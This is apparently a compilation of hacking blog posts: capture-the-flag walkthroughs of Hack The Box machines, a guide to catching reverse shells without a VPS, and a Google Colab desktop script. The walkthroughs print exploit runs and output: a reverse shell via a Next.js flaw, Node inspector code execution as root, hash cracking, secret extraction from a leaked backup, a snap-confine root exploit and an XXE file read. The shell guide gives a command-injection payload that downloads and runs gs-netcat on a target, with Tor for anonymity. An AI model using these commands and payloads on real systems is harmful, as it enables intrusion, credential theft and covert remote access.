Download the PDF

Lets Start !

┌──(kali㉿kali)-[~/Downloads/reactor]
└─$ rustscan -a 10.129.5.129
Open 10.129.5.129:22
Open 10.129.5.129:3000

Wow lets see whats running on port 3000 ! Its a next js app And i notice my react2shell browser extension can tell me something Upon looking at the version of next js 15.0.2 using wrapalyzer Vulnerability confirm ! Since its a known vulnerability i spawn the weapon Link : https://github.com/zr0n/react2shell

┌──(kali㉿kali)-[~/Downloads/react2shell/react2shell]
└─$ node react2shell.js http://10.129.5.129:3000 shell 10.10.14.98 4444
═══════════════════════════════════════════
React2Shell - CVE-2025-55182 Exploit
═══════════════════════════════════════════
[*] Target: http://10.129.5.129:3000
[*] Payload: reverse shell to 10.10.14.98:4444
[!] Ensure listener is ready: nc -lvnp 4444
[*] Sending malicious request...
[+] Request sent successfully
[*] Check server console for output

Another terminal start nc -lvnp 4444 or you can use a better tool called pwncat ! Btw after got the shell ! I notice

┌──(kali㉿kali)-[~/Downloads/reactor]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.98] from (UNKNOWN) [10.129.5.129] 52808
bash: cannot set terminal process group (1377): Inappropriate ioctl for device
bash: no job control in this shell
node@reactor:/opt/reactor-app$ ls
ls
app
next.config.js
node_modules
package.json
package-lock.json reactor.db
node@reactor:/opt/reactor-app$

A db file Lets pull it on my local machine Python3 - m http.server 5555 Then wget http://ip:5555/reactor.db

┌──(kali㉿kali)-[~/Downloads/react2shell/react2shell]
└─$ sqlite3 reactor.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> select * from users;
1|admin|a203b22191redact5c101b17b8|administrator|admin@reactor.htb
2|engineer|39d9711redact12cd271e8e|operator|engineer@reactor.htb
Program interrupted.

Lets crack those Found password for engineer user !

echo "hashhere" > hashes.txt
echo "hashhere" >> hashes.txt
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Quickly login via ssh ! Ssh engineer@ip And boom !

engineer@10.129.5.129's password:
____ _____ _ ____ _____ ___ ____
| _ \| ____| / \ / ___|_ _/ _ \| _ \
| |_) | _| / _ \| | | || | | | |_) |
| _ <| |___ / ___ \ |___ | || |_| | _ <
|_| \_\_____/_/ \_\____| |_| \___/|_| \_\
ReactorWatch Core Monitoring System
Nuclear Dynamics Corp. - Site 7
AUTHORIZED PERSONNEL ONLY
Last login: Mon May 25 17:56:58 2026 from 10.10.14.98

Found user.txt flag yahhh Next root right ? But before that lets analyze the system first First i run sudo -l Sorry, user engineer may not run sudo on reactor. Not works Lets see the processes And notice root 1384 0.0 1.2 1068080 51080 ? Ssl 11:21 0:02 /usr/bin/node –inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js Owned by root ! wow Ss -tlpn

engineer@reactor:/$ ss -tlnp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 5 0.0.0.0:5555 0.0.0.0:*
LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
LISTEN 0 511 127.0.0.1:9229 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:22 0.0.0.0:*
LISTEN 0 511 *:3000 *:*
LISTEN 0 4096 [::]:22 [::]:

The root process is already running with –inspect. I need to connect to it For that i need a debugger right so I used a simple method using Chrome DevTools ssh -L 9229:127.0.0.1:9229 engineer@10.129.5.129 chrome://inspect Click “Add connection” and add: localhost:9229 Then you’ll see the Node.js process and can run commands in console For first time Allow pasting Once connected run require(‘child_process’).execSync(‘cat /root/root.txt’).toString() Congratulations! You’ve rooted the machine! Whats going on under the hood ? The –inspect flag enables the Chrome DevTools Protocol - a debugging interface that allows: ● Attaching debuggers (like Chrome) ● Setting breakpoints ● Executing arbitrary JavaScript in the process context Chrome Browser ←── WebSocket ←── Target’s Node.js Process (root) Chrome spoke the DevTools Protocol - a JSON-based language for debugging. require(‘child_process’) command was wrapped in a JSON message: json

{
"id": 1,
"method": "Runtime.evaluate",
"params": {
"expression": "require('child_process').execSync('cat /root/root.txt').toString()"
}
}

Initial Enumeration

Nmap Scan

nmap -sC -sV -oA helix 10.129.60.0

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.15
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://helix.htb/

Add to /etc/hosts

echo "10.129.60.0 helix.htb" >> /etc/hosts

Web Reconnaissance

Visiting http://helix.htb shows a static “Industrial Operator” page. Nothing interactive.

Vhost Fuzzing

ffuf -u http://10.129.60.0 -H "Host: FUZZ.helix.htb" \
     -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
     -mc all -ac

Result: flow.helix.htb [Status: 200]

Add to /etc/hosts

echo "10.129.60.0 flow.helix.htb" >> /etc/hosts

If you want the full Helix HTB writeup and post‑exploitation steps, please support via Ko‑fi. If you don’t want to, just email me at sensurajit@proton.me and I’ll share it.

Disclaimer: This post is intended for educational purposes only. Only use these techniques on systems you own or have explicit written permission to test. Unauthorized access is illegal. All demonstrations shown in the pictures were strictly tested in a dockerized environment I own.

If you don’t have a VPS to get a reverse shell, no problem — I hear you!

First of all, you don’t need a VPS to get a reverse shell. You just need something that has a public endpoint, like a relay or a TCP tunneling service.

Want to know the options? Here we go.

Method 1: Ngrok The first service is ngrok, which offers TCP connections. The downside is it requires a credit or debit card to be added to your account, and many of you either don’t have one or are worried about putting sensitive information into an ngrok account — so it’s not ideal for everyone.

Method 2: Pinggy A tunneling service that provides a TCP address with a 60-minute expiration, which is reliable for quick sessions. The downside is that the tunnel address binds to your actual IP, which can expose it. Using a VPN beforehand solves this.

Method 3: gs-netcat (Recommended) This is the best method I’ve found for catching shells without any VPS or port forwarding needed.

• No public IP required
• No port forwarding
• End-to-end encrypted (AES-256)
• Optional Tor routing with -T flag for full anonymity (this is what we want)
• Works through firewalls and NAT

For more info: https://www.gsocket.io/

Generate a secret:

[root@DESKTOP-5R8GB0U ~] gs-netcat
Enter Secret (or press Enter to generate):
=Secret         : your-secret-goes-here
=Encryption     : SRP-AES-256-CBC-SHA-End2End (Prime: 4096 bits)

Once you’ve generated the secret, deploy it on the target machine (I used my own hosted AWS server here):

; curl -sL https://github.com/hackerschoice/gsocket/releases/download/v1.4.43/gs-netcat_linux-x86_64 -o /tmp/gs-netcat && chmod +x /tmp/gs-netcat && nohup /tmp/gs-netcat -s your-secret-goes-here -l -i &

This fetches the binary on the target and executes it. Add the -T flag for Tor routing (optional).

Finally, connect from your machine:

gs-netcat -s your-secret-goes-here -i

Note: This payload is designed for command injection based attacks. You can adapt it to your needs.

That’s all folks! There are other platforms available that offer free tunneling, but these are the two methods I found most useful. Hope you liked it — thank you!

• note that -T requires Tor to be running locally (systemctl start tor)
• this targets Linux x86_64 — different arch needs a different binary

Google Colab might help !

first of all google colab is a free, cloud-based Jupyter Notebook environment that allows users to write and execute Python code in a browser.

but there is some more juicy stuffs you can do it here !

we can make it a full featured vm

Features

• XFCE Desktop Environment
• noVNC Browser Access
• SSH Access ( Using Tailscale or https://pinggy.io )
• Cloudflare Tunnel for Access the vm on browser
• Browser Support ( use falkon , google-chrome)
• GPU Access
• Linux Terminal
• Package Installation
• Temporary VPS-like Environment

What You Can Do

• browse internet
• run linux apps
• install tools
• access terminal remotely
• host temporary services to play with it
• run GUI applications
• use it as a lightweight cloud desktop
• practice cybersec stuffs
• view any temp file that you think may be infected.

Limitations

• session expires
• files are temporary
• idle disconnects
• not a real persistent VPS
• limited resources

but here is some trick :

you CAN make the environment semi-persistent using Google Drive + auto-restore scripts.

Using Google Drive mount:

from google.colab import drive
drive.mount('/content/drive')

you can persist:

scripts browser profiles VSCode settings projects downloaded files SSH configs VNC configs package lists etc sounds great right ? you can find more tips and trick by googling but here is some refs : https://gist.github.com/hiraksarkar/2af99db628c2528cc5362c21da9985cc

https://medium.com/@robertbracco1/configuring-google-colab-like-a-pro-d61c253f7573

Setup Stack

before running any script first mount the drive

from google.colab import drive
drive.mount('/content/drive')

then run the bash script open the attached terminal on colab then just install nano apt install -y nano and paste the script or use

cat > persistent_colab_vm.sh << 'EOF'

# paste script here

EOF

#!/bin/bash

set -e

USERNAME="colab"
PASSWORD="colab123"
VNC_PASSWORD="123456"

PERSIST_BASE="/content/drive/MyDrive/colab-vm"

if [ ! -d "/content/drive/MyDrive" ]; then
    echo
    echo "[!] Google Drive is not mounted."
    echo
    echo "Run this FIRST inside Colab:"
    echo
    echo "from google.colab import drive"
    echo "drive.mount('/content/drive')"
    echo
    exit 1
fi

export USER=root
export HOME=/root
export DISPLAY=:1
export XDG_RUNTIME_DIR=/tmp/runtime-root

mkdir -p $XDG_RUNTIME_DIR
chmod 700 $XDG_RUNTIME_DIR

mkdir -p $PERSIST_BASE
mkdir -p $PERSIST_BASE/chrome-profile
mkdir -p $PERSIST_BASE/workspace
mkdir -p $PERSIST_BASE/vnc
mkdir -p $PERSIST_BASE/scripts

echo "[*] Updating packages..."

apt update -y

echo "[*] Installing packages..."

apt install -y \
xfce4 \
xfce4-goodies \
tightvncserver \
novnc \
websockify \
wget \
curl \
sudo \
dbus-x11 \
falkon

echo "[*] Creating user..."

id -u $USERNAME &>/dev/null || useradd -m -s /bin/bash $USERNAME

echo "$USERNAME:$PASSWORD" | chpasswd

usermod -aG sudo $USERNAME

mkdir -p /home/$USERNAME/.vnc

cat > /home/$USERNAME/.vnc/xstartup << 'EOL'
#!/bin/bash

xrdb $HOME/.Xresources

export XKL_XMODMAP_DISABLE=1

unset SESSION_MANAGER
unset DBUS_SESSION_BUS_ADDRESS

startxfce4 &
EOL

chmod +x /home/$USERNAME/.vnc/xstartup

echo "$VNC_PASSWORD" | vncpasswd -f > /home/$USERNAME/.vnc/passwd

chmod 600 /home/$USERNAME/.vnc/passwd

chown -R $USERNAME:$USERNAME /home/$USERNAME/.vnc

echo "[*] Restoring browser profile..."

mkdir -p /home/$USERNAME/.config/google-chrome

if [ -d "$PERSIST_BASE/chrome-profile/Default" ]; then
    cp -r $PERSIST_BASE/chrome-profile/* \
    /home/$USERNAME/.config/google-chrome/ || true
fi

chown -R $USERNAME:$USERNAME /home/$USERNAME/.config

echo "[*] Cleaning old sessions..."

pkill Xtightvnc 2>/dev/null || true
pkill websockify 2>/dev/null || true
pkill cloudflared 2>/dev/null || true

rm -rf /tmp/.X1-lock
rm -rf /tmp/.X11-unix/X1

echo "[*] Starting VNC..."

su - $USERNAME -c "
export USER=$USERNAME
export HOME=/home/$USERNAME
vncserver :1 -geometry 1366x768 -depth 24
"

if ! command -v google-chrome &>/dev/null; then

    echo "[*] Installing Chrome..."

    wget -q https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb

    apt install -y ./google-chrome-stable_current_amd64.deb || true
fi

if [ ! -f "./cloudflared" ]; then

    echo "[*] Downloading cloudflared..."

    wget -q \
    https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 \
    -O cloudflared

    chmod +x cloudflared
fi

echo "[*] Starting noVNC..."

websockify \
--web=/usr/share/novnc/ \
0.0.0.0:6080 \
localhost:5901 &

cat > $PERSIST_BASE/scripts/save_profile.sh << 'EOL'
#!/bin/bash

cp -r /home/colab/.config/google-chrome/* \
/content/drive/MyDrive/colab-vm/chrome-profile/ || true
EOL

chmod +x $PERSIST_BASE/scripts/save_profile.sh

echo
echo "========================================"
echo
echo "[+] Persistent Colab VM Ready"
echo
echo "User: $USERNAME"
echo "Password: $PASSWORD"
echo
echo "VNC Password: $VNC_PASSWORD"
echo
echo "Workspace:"
echo "$PERSIST_BASE/workspace"
echo
echo "Saving browser profile:"
echo
echo "bash $PERSIST_BASE/scripts/save_profile.sh"
echo
echo "========================================"
echo

./cloudflared tunnel --url http://0.0.0.0:6080

Make Executable

chmod +x persistent_colab_vm.sh

and then run

./persistent_colab_vm.sh

Open noVNC

After setup completes:

https://random.trycloudflare.com/vnc.html

Use:

Save Browser Session

Before runtime ends:

bash /content/drive/MyDrive/colab-vm/scripts/save_profile.sh

and enjoy your cloud desktop :) thanks for reading btw.

After getting the target ip address, the first step was to perform an Nmap scan to identify open ports and services:

nmap -sC -sV -A -p- -O --min-rate=1000 10.129.42.237

Scan Results:

Starting Nmap 7.95 at 2026-04-28 02:15 EDT
Nmap scan report for 10.129.42.237
Host is up (0.29s latency).
Not shown: 65533 closed tcp ports (reset)

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15
| ssh-hostkey: 
|   256 4b:c1:eb:48:87:4a:08:54:89:70:93:b7:c7:a9:ea:79 (ECDSA)
|_  256 46:da:a5:65:91:c9:08:99:b2:96:1d:46:0b:fc:df:63 (ED25519)

80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://snapped.htb/

Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops

Web Enumeration & Subdomain Discovery

Navigating to http://10.129.42.237 revealed a redirect to http://snapped.htb. The domain was added to /etc/hosts:

echo "10.129.42.237 snapped.htb" | tee -a /etc/hosts

Initial browsing of snapped.htb didn’t revealed anything juicy, so subdomain fuzzing was performed:

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt \
      -u http://snapped.htb -H "HOST: FUZZ.snapped.htb" -mc 200

Discovery:

admin                   [Status: 200, Size: 1407, Words: 164, Lines: 50]

The subdomain admin.snapped.htb was added to /etc/hosts and accessed, revealing an Nginx UI dashboard.

Exploiting CVE-2026-27944 (Nginx UI)

Research into Nginx UI vulnerabilities revealed:

Critical Vulnerabilities (2026):

1. CVE-2026-33032 (MCPwn Authentication Bypass - CVSS 9.8)
   • The /mcp_message endpoint fails to enforce authentication
   • Allows unauthenticated attackers to manage Nginx and execute commands
2. CVE-2026-27944 (Unauthenticated Backup Download - CVSS 9.8)
   • Versions before 2.3.3 allow unauthenticated backup access
   • AES-256 encryption key and IV disclosed in X-Backup-Security header
   • Enables decryption of credentials, SSL keys, and configs
3. CVE-2026-33026 (Backup Tampering & Injection)
   • Fixed in 2.3.4, allows malicious config injection

Exploiting the Backup Vulnerability

Accessing http://admin.snapped.htb/api/backup downloaded a ZIP file:

┌──(kali㉿blackXploit)-[~/Downloads/snappedhtb]
└─$ file backup-20260428-022136.zip 
backup-20260428-022136.zip: Zip archive data

┌──(kali㉿blackXploit)-[~/Downloads/snappedhtb]
└─$ unzip backup-20260428-022136.zip 
Archive:  backup-20260428-022136.zip
  inflating: hash_info.txt           
  inflating: nginx-ui.zip            
  inflating: nginx.zip

┌──(kali㉿blackXploit)-[~/Downloads/snappedhtb]
└─$ cat hash_info.txt 
�)+��ƺ�c��MfL�U98�5�5Ԕ��G�c�]F�Ujr'���|�!
%&��(���x       �9t5�Q�]_>��(@��B��k���c��7�2_O��#��\�����>�c{�Q�����ڄ�>l�����ƝT7/�}��X��uC��(
�A(�K�/��
         ��
           ց��0QS�軭��  

its encrypted The X-Backup-Security header contained the encryption key and IV:

┌──(kali㉿blackXploit)-[~/Downloads/snappedhtb]
└─$ curl -v http://admin.snapped.htb/api/backup -o backup.zip 2>&1 | grep -i "X-Backup-Security"
< X-Backup-Security: 4kaig8RUr+4NSvfJ6Of3bj6W7nP9VwYP9IjZGSiGCto=:wevqrDQJpKHXzrJSr+taQg==

Decrypting the Backup

Using a public exploit for CVE-2026-27944:

https://github.com/Skynoxk/CVE-2026-27944

┌──(kali㉿blackXploit)-[~/Downloads/snappedhtb/CVE-2026-27944-POC]
└─$ python exploit_enhanced.py --target http://admin.snapped.htb --decrypt --show-secrets
        
======================================================================
CVE-2026-27944 - Nginx UI Unauthenticated Backup Download + Dashboard Access
======================================================================

[*] Downloading backup from http://admin.snapped.htb/api/backup
[+] Backup downloaded successfully (18306 bytes)
[+] Saved to: backup.bin

[*] X-Backup-Security header: FHAHISTlSj7auC9HPLsz6xby+mBvo3bvbl7VMyNOWZE=:ZMpW3hraTFvZc/EF6Rr+jw==
[+] Parsed AES-256 key: FHAHISTlSj7auC9HPLsz6xby+mBvo3bvbl7VMyNOWZE=
[+] Parsed AES IV    : ZMpW3hraTFvZc/EF6Rr+jw==

[+] Key length: 32 bytes (AES-256 ✓)
[+] IV length : 16 bytes (AES block size ✓)

[*] Extracting encrypted backup to backup_extracted
[*] Main archive contains: ['hash_info.txt', 'nginx-ui.zip', 'nginx.zip']
[*] Decrypting hash_info.txt...
    → Saved to backup_extracted/hash_info.txt.decrypted (199 bytes)
[*] Decrypting nginx-ui.zip...
    → Saved to backup_extracted/nginx-ui_decrypted.zip (7688 bytes)
    → Extracted 2 files to backup_extracted/nginx-ui
[*] Decrypting nginx.zip...
    → Saved to backup_extracted/nginx_decrypted.zip (9936 bytes)
    → Extracted 22 files to backup_extracted/nginx

[*] Hash info:
nginx-ui_hash: 4ad8655192ed5ee220cb820d46db34c1049c37ef4a7ddc5482010620976e72bb
nginx_hash: 2f0263bd95d62226c216fff4bc222711b713e9b4a993207dc8695137c536af09
timestamp: 20260428-024653
version: 2.3.2


[*] Extracting secrets from backup_extracted/nginx-ui/app.ini
[+] Secrets extracted:
    JWT Secret    : 6c4af436-035a-4942-9ca6-172b36696ce9
    Node Secret   : c64d7ca1-19cb-4ebe-96d4-49037e7df78e
    Crypto Secret : 5c942292647d73f597f47c0be2237bf7347cdb70a0e8e8558e448318862357d6
    Email         : admin@test.htb

[*] Verifying Node Secret bypass...
[+] Node Secret verified! Admin API access confirmed
[+] Total users in system: 2

┌──(kali㉿blackXploit)-[~/…/snappedhtb/CVE-2026-27944-POC/backup_extracted/nginx-ui]
└─$ ls                        
app.ini  database.db
                                                                                             
┌──(kali㉿blackXploit)-[~/…/snappedhtb/CVE-2026-27944-POC/backup_extracted/nginx-ui]
└─$ pwd                                                                                  
/home/kali/Downloads/snappedhtb/CVE-2026-27944-POC/backup_extracted/nginx-ui

SSH Access

After cracking the password for user jonathan:

┌──(kali㉿blackXploit)-[~/Downloads]
└─$ ssh jonathan@snapped.htb
The authenticity of host 'snapped.htb (10.129.42.237)' can't be established.
ED25519 key fingerprint is: SHA256:n0XlQQqHGczclhalpCeoOZDYQGr7rl3WlJytHLWPkr8
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'snapped.htb' (ED25519) to the list of known hosts.
jonathan@snapped.htb's password: 

Successful Login:

Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.17.0-19-generic x86_64)

jonathan@snapped:~$ ls
Desktop  Documents  Downloads  linpeas.sh  Music  Pictures  Public  snap  Templates  user.txt  Videos

Privilege Escalation via CVE-2026-3888

Understanding the Vulnerability

CVE-2026-3888 is a local privilege escalation vulnerability in snap-confine and systemd-tmpfiles. Here’s how it works:

Step 1: The Regular Cleanup (The Trigger)

• Linux systems use systemd-tmpfiles to delete old files in /tmp to save space
• By default, it clears out files every few weeks
• The Flaw: When this service deletes /tmp/.snap, it briefly leaves a “hole” where that folder used to be

Step 2: The Race Condition (The Timing)

• This is a TOCTOU (Time-of-Check to Time-of-Use) bug
• An attacker cannot delete the folder themselves (no permission), so they wait for the system to do it
• The Attack: The attacker runs a script that constantly watches that folder. The millisecond the system deletes it, the attacker’s script “races” to recreate a new version of that folder before the real snap service notices it’s gone

Step 3: The Bait-and-Switch

• Because the attacker created the new /tmp/.snap folder, they own it
• They place a “trap” inside: a symbolic link pointing to a sensitive part of the system (like the root filesystem)

Step 4: The Elevation (The Payoff)

• Any snap app starting (or triggered by the attacker) causes snap-confine to run
• snap-confine sees the folder is missing or needs resetting, so it prepares the sandbox
• Because snap-confine runs with Root privileges, it follows the attacker’s “shortcut” without realizing it’s a trap
• It ends up mounting the attacker’s malicious files into a high-privilege area
• The Result: The attacker, who started as a normal user, now has a “backdoor” into the system’s core and becomes Root

System Information

jonathan@snapped:~$ snap --version
snap    2.63.1+24.04
snapd   2.63.1+24.04
series  16
ubuntu  24.04
kernel  6.17.0-19-generic

Executing the Exploit

The exploit was run against the Firefox snap:

how this exploit works ?

systemd-tmpfiles deletes the stale .snap mimic directory under /tmp (30-day age-out)
Attacker recreates it with controlled content — all files owned by the attacker
Exploit single-steps snap-confine via AF_UNIX socket backpressure to reliably win the race during the mimic bind-mount sequence
Attacker-owned libraries are mounted into the sandbox as root
ld-linux-x86-64.so.2 is replaced with shellcode that calls setreuid(0,0) + execve
Executing SUID snap-confine triggers the shellcode with root privileges
SUID bash is dropped to /var/snap/firefox/common/ to escape the sandbox

jonathan@snapped:~/snap$ ./exploit ./librootshell.so -d 

Exploit Output:

================================================================
    CVE-2026-3888 — snap-confine / systemd-tmpfiles SUID LPE
================================================================
[*] Payload: /home/jonathan/snap/./librootshell.so (9056 bytes)

[Phase 1] Entering Firefox sandbox...
[+] Inner shell PID: 65385

[Phase 2] Waiting for .snap deletion...
[*] --skip-wait: triggering cleanup...

[Phase 3] Race condition execution...
logger.go:93: DEBUG: need to create writable mimic needed to create path "/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0"
logger.go:93: DEBUG: create-writable-mimic "/usr/lib/x86_64-linux-gnu"
logger.go:93: DEBUG: mount name:"/usr/lib/x86_64-linux-gnu" dir:"/tmp/.snap/usr/lib/x86_64-linux-gnu"

[!]   TRIGGER — swapping directories...
[+]   SWAP DONE — race won!
[*]   ld-linux in namespace: jonathan:jonathan 755
[+]   Poisoned namespace PID: 65882

[Phase 5] Injecting payload into poisoned namespace...
[+]   ld-linux owned by uid 1000 (attacker). Race confirmed.
[*]   Planting busybox...
[*]   Writing escape script → /tmp/sh
[*]   Overwriting ld-linux-x86-64.so.2...
[+]   Payload injected.

[Phase 6] Triggering root via SUID snap-confine...
[*]   snap-confine → snap-confine (SUID trigger)
[*]   Exit status: 0

[Phase 7] Verifying...
[+] SUID root bash: /var/snap/firefox/common/bash (mode 4755)
[*] Cleaning up background processes...

================================================================
  ROOT SHELL: /var/snap/firefox/common/bash -p
================================================================

Root Access Achieved

bash-5.1# id
uid=1000(jonathan) gid=1000(jonathan) euid=0(root) groups=1000(jonathan)

bash-5.1# ls
Desktop  Documents  Downloads  linpeas.sh  Music  Pictures  Public  snap  Templates  user.txt  Videos

bash-5.1# cd /root
bash-5.1# ls
nginxui  root.txt  snap

bash-5.1# cat root.txt
redact

References

• CVE-2026-3888 Exploit on GitHub
• CVE-2026-27944

Thanks for reading ! happy hacking

after getting the ip i first ran

nmap -sC -sV -p- --min-rate=10000 10.129.244.208

got

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.15.9
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 Sep 22  2025 pub
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 83:13:6b:a1:9b:28:fd:bd:5d:2b:ee:03:be:9c:8d:82 (ECDSA)
|_  256 0a:86:fa:65:d1:20:b4:3a:57:13:d1:1a:c2:de:52:78 (ED25519)
80/tcp   open  http    Apache httpd 2.4.58
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: DevArea - Connect with Top Development Talent
8080/tcp open  http    Jetty 9.4.27.v20200227
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.27.v20200227)
8500/tcp open  http    Golang net/http server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 500 Internal Server Error
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Thu, 09 Apr 2026 07:49:11 GMT
|     Content-Length: 64
|     This is a proxy server. Does not respond to non-proxy requests.
|   GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 500 Internal Server Error
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Thu, 09 Apr 2026 07:48:52 GMT
|     Content-Length: 64
|     This is a proxy server. Does not respond to non-proxy requests.
|   HTTPOptions: 
|     HTTP/1.0 500 Internal Server Error
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Thu, 09 Apr 2026 07:48:53 GMT
|     Content-Length: 64
|_    This is a proxy server. Does not respond to non-proxy requests.
8888/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Hoverfly Dashboard

so juicy right ? lets check whats inside this ftp server :

└─# ftp 10.129.244.208   
Connected to 10.129.244.208.
220 (vsFTPd 3.0.5)
Name (10.129.244.208:kali): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||43974|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Sep 22  2025 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||41712|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp       6445030 Sep 22  2025 employee-service.jar
226 Directory send OK.
ftp> get 

Downloaded File:

employee-service.jar (a java archive file ) lets see 

Decompiling with jd-gui

jd-gui

open the file inside it

juicy file: ServerStarter.java

package htb.devarea;

import org.apache.cxf.jaxws.JaxWsServerFactoryBean;

public class ServerStarter {
    public static void main(String[] args) {
        JaxWsServerFactoryBean factory = new JaxWsServerFactoryBean();
        factory.setServiceClass(EmployeeService.class);
        factory.setServiceBean(new EmployeeServiceImpl());
        factory.setAddress("http://0.0.0.0:8080/employeeservice");
        factory.create();
        System.out.println("Employee Service running at http://localhost:8080/employeeservice");
        System.out.println("WSDL available at http://localhost:8080/employeeservice?wsdl");
    }
}

Critical Observations

Vulnerability Research

Googling “Apache CXF Jetty 9.4.27 vulnerability” leads us to:

CVE-2022-46364 - Apache CXF XXE via XOP Include in MTOM SOAP requests

Vulnerability Details:

• Affected Versions: Apache CXF ≤ 3.5.2 / ≤ 3.4.9
• Impact: Arbitrary file read via XXE/SSRF
• Vector: MTOM+XOP attachment processing

How it works: MTOM (Message Transmission Optimization Mechanism) uses <xop:Include href="..."> tags to reference binary attachments. The vulnerable CXF version doesn’t validate the URI scheme, allowing file:// protocol to read local files.

XXE Exploitation (CVE-2022-46364)

Exploit Script: CVE-2022-46364.py

I found a public PoC and modified it for our target. (https://github.com/kasem545/CVE-2022-46364-Poc)

# python3 CVE-2022-46364.py

[CONFIG]
  Target:   http://devarea.htb:8080/employeeservice
  SSRF URL: file:///etc/passwd
  Domain:   devarea.htb
  Method:   MTOM

[*] Sending exploit payload...
[+] Server responded: HTTP 200

[RAW RESPONSE SNIPPET]
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ns2:submitReportResponse xmlns:ns2="http://devarea.htb/"><return>Report received from cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjpt

[BASE64 EXTRACTED]
cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xv...

[EXFILTRATED CONTENT]
======================================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nol
---

Success! the user running the Jetty service.discovered a user: dev_ryan.

Finding Hoverfly Configuration

as we have previously discovered the Hoverfly instance on port 8080 i quickly googled any vulnerability exits or not and found CVE-2025-54123 - Hoverfly Command Injection (RCE) The vulnerability exists in the middleware management API endpoint /api/v2/hoverfly/middleware where insufficient input validation and sanitization allows attackers to inject and execute arbitrary system commands. This flaw enables unauthenticated remote code execution (RCE) on any system running vulnerable Hoverfly versions 1.11.3 and prior. more : https://www.sentinelone.com/vulnerability-database/cve-2025-54123/ https://github.com/advisories/GHSA-r4h8-hfp2-ggmf but before exploiting we need to find the admin creds. The systemd unit file for HoverFly reveals its startup command — complete with hardcoded credentials passed as CLI arguments.

python3 CVE-2022-46364.py \
  -t http://devarea.htb:8080/employeeservice \
  -s file:///etc/systemd/system/hoverfly.service \
